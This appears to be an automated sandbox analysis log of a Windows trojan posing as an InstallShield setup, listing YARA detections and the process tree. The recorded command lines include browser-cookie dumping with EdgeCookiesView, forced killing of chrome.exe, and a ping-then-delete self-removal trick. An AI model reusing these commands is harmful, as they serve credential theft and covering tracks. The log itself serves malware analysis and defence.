Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1001EBD0
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_1001EDDB
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1000C063
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1000B883
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_100060F0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_100169BD
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_100099E0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_100071F0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10009257
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10010AED
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10008340
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1000E380
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1000ABA0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1000B3B0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1001EBD0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_100083F0
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1000BC57
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1000C483
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_10010590
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1001EDDB
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: 3_2_1000FF71
Source: C:\Users\user\AppData\Roaming\1612045890161.exe | Code function: 11_2_00404BE4
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 30_2_002B963B
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 30_2_002B6A1E
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 30_2_002BA0C3
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 30_2_002BB51C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 30_2_002B9B7F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe | Code function: 30_2_002BA7BB
Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 344B323928698D9982C7577E5405A1CB587C45F94A0F6745827648381397F255
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Code function: String function: 10010534 appears 35 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: String function: 0044280F appears 302 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: String function: 004025E0 appears 342 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: String function: 10010534 appears 35 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: String function: 0040C6E1 appears 99 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: String function: 00411D8B appears 39 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: String function: 00442842 appears 295 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: String function: 00442878 appears 83 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: String function: 00441423 appears 42 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: String function: 004115CB appears 41 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: String function: 00401070 appears 36 times
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: String function: 00441570 appears 54 times
Source: fnhcdXEfus.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 63C4F3D9EA0CC861.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1612045890161.exe.3.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1612045890161.exe.3.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: fnhcdXEfus.exe, 00000000.00000002.246163908.00000000024AA000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameInstallShield Setup.exe^ vs fnhcdXEfus.exe
Source: fnhcdXEfus.exe, 00000000.00000002.246034972.0000000000BA0000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemswsock.dll.muij% vs fnhcdXEfus.exe
Source: fnhcdXEfus.exe, 00000000.00000002.246020495.0000000000B80000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamenlsbres.dllj% vs fnhcdXEfus.exe
Source: fnhcdXEfus.exe, 00000000.00000002.246024794.0000000000B90000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamenlsbres.dll.muij% vs fnhcdXEfus.exe
Source: fnhcdXEfus.exe | Binary or memory string: OriginalFilenameInstallShield Setup.exe^ vs fnhcdXEfus.exe
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: tsappcmp.dll
Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
Source: fnhcdXEfus.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: 00000004.00000002.274583056.00000000026D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000003.00000002.365832214.00000000026F0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000000.00000002.246525217.0000000002810000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.fnhcdXEfus.exe.2810000.5.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 3.2.63C4F3D9EA0CC861.exe.26f0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.63C4F3D9EA0CC861.exe.26d0000.5.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.63C4F3D9EA0CC861.exe.10000000.7.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 3.2.63C4F3D9EA0CC861.exe.10000000.7.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.63C4F3D9EA0CC861.exe.26d0000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 3.2.63C4F3D9EA0CC861.exe.26f0000.2.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.fnhcdXEfus.exe.10000000.6.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.fnhcdXEfus.exe.2810000.5.raw.unpack, type: UNPACKEDPE | Matched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.63C4F3D9EA0CC861.exe.3280000.6.unpack, type: UNPACKEDPE | Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 3.2.63C4F3D9EA0CC861.exe.3380000.5.unpack, type: UNPACKEDPE | Matched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: classification engine | Classification label: mal90.bank.troj.spyw.evad.winEXE@32/37@4/2
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0045895B GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_0043FFF7 lstrcpyW,GetDiskFreeSpaceExW,
Source: C:\Users\user\AppData\Roaming\1612045890161.exe | Code function: 11_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00431AAB CoCreateInstance,
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Code function: 0_2_00418579 FindResourceW,SizeofResource,LoadResource,LockResource,
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | File created: C:\Users\user\AppData\Local\Login Data1612045889505
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1968:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5752:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3924:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | File created: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: runfromtemp
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: eprq
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: debuglog
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: Setup.cpp
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: reboot
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: Setup.cpp
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: Setup.cpp
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: %s%s
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: tempdisk1folder
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: ISSetup.dll
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: ISSetup.dll
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: Skin
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: Startup
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: setup.isn
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: Supported
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: Languages
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: %s\%s.ini
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: %s\%s.ini
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: %s\%.04ld.mst
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: %s\%.04ld.mst
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: StartUp
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: Setup.cpp
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: clone_wait
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: HsG
Source: C:\Users\user\Desktop\fnhcdXEfus.exe | Command line argument: Setup.cpp
Source: fnhcdXEfus.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\1612045890161.exe | System information queried: HandleInformation
Source: C:\Windows\SysWOW64\taskkill.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "chrome.exe")
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\win.iniJump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\fnhcdXEfus.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\fnhcdXEfus.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: fnhcdXEfus.exe Virustotal: Detection: 73%
Source: fnhcdXEfus.exe Metadefender: Detection: 29%
Source: fnhcdXEfus.exe ReversingLabs: Detection: 82%
Source: C:\Users\user\Desktop\fnhcdXEfus.exe File read: C:\Users\user\Desktop\fnhcdXEfus.exe
Source: unknown Process created: C:\Users\user\Desktop\fnhcdXEfus.exe 'C:\Users\user\Desktop\fnhcdXEfus.exe'
Source: unknown Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknown Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 72A2D95648135F8DB654A3D18B753FD0 C
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 0011 installp2
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 200 installp2
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\fnhcdXEfus.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown Process created: C:\Users\user\AppData\Roaming\1612045890161.exe 'C:\Users\user\AppData\Roaming\1612045890161.exe' /sjson 'C:\Users\user\AppData\Roaming\1612045890161.txt'
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\fnhcdXEfus.exe Process created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: C:\Users\user\Desktop\fnhcdXEfus.exe Process created: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 0011 installp2
Source: C:\Users\user\Desktop\fnhcdXEfus.exe Process created: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe 200 installp2
Source: C:\Users\user\Desktop\fnhcdXEfus.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\fnhcdXEfus.exe'
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe Process created: C:\Users\user\AppData\Roaming\1612045890161.exe 'C:\Users\user\AppData\Roaming\1612045890161.exe' /sjson 'C:\Users\user\AppData\Roaming\1612045890161.txt'
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe Process created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe'
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\msiexec.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32
Source: C:\Windows\SysWOW64\msiexec.exe Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe Automated click: Next >
Source: C:\Windows\SysWOW64\msiexec.exe Automated click: Install
Source: Window Recorder Window detected: More than 3 window changes detected
Source: fnhcdXEfus.exe Static file information: File size 4453376 > 1048576
Source: C:\Users\user\AppData\Local\Temp\63C4F3D9EA0CC861.exe File opened: C:\Users\user\AppData\Local\Temp\download\msvcr71.dll
Source: fnhcdXEfus.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: fnhcdXEfus.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: fnhcdXEfus.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: fnhcdXEfus.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: fnhcdXEfus.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: fnhcdXEfus.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: fnhcdXEfus.exe Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: fnhcdXEfus.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdb source: MiniThunderPlatform.exe.3.dr
Source: Binary string: c:\Projects\VS2005\EdgeCookiesView\Release\EdgeCookiesView.pdb source: 1612045890161.exe, 0000000B.00000000.258604279.000000000040F000.00000002.00020000.sdmp, 1612045890161.exe.3.dr
Source: Binary string: atl71.pdbT source: atl71.dll.3.dr
Source: Binary string: msvcr71.pdb\ source: msvcr71.dll.3.dr
Source: Binary string: atl71.pdb source: atl71.dll.3.dr
Source: Binary string: d:\MiniDownloadLib\branches\bin\Product Release\download_engine.pdb source: download_engine.dll.3.dr
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdbpJ source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\MiniThunderPlatform.pdbt source: MiniThunderPlatform.exe.3.dr
Source: Binary string: d:\MiniTP\Src\MiniThunderPlatform\pdb\ProductForCommon\xldl.pdb source: xldl.dll.3.dr
Source: Binary string: msvcp71.pdb source: msvcp71.dll.3.dr
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb0 source: dl_peer_id.dll.3.dr
Source: Binary string: C:\CodeBases\isdev\redist\Language Independent\i386\setup.pdb source: fnhcdXEfus.exe
Source: Binary string: f:\sys\objfre_wxp_x86\i386\FsFilter32.pdb source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp
Source: Binary string: d:\workspace\xlframework\win32_component\ThunderFW\Release\ThunderFW.pdb source: ThunderFW.exe, 0000001E.00000002.347950817.00000000002BC000.00000002.00020000.sdmp, ThunderFW.exe.3.dr
Source: Binary string: f:\sys\objfre_win7_amd64\amd64\FsFilter64.pdb source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp
Source: Binary string: e:\xl7\Product Release\dl_peer_id.pdb source: dl_peer_id.dll.3.dr
Source: Binary string: msvcr71.pdb source: msvcr71.dll.3.dr
Source: Binary string: d:\BranchAI\launcher\Release\fileLauncher.pdb source: MSI6DDB.tmp.1.dr
Source: fnhcdXEfus.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: fnhcdXEfus.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: fnhcdXEfus.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: fnhcdXEfus.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
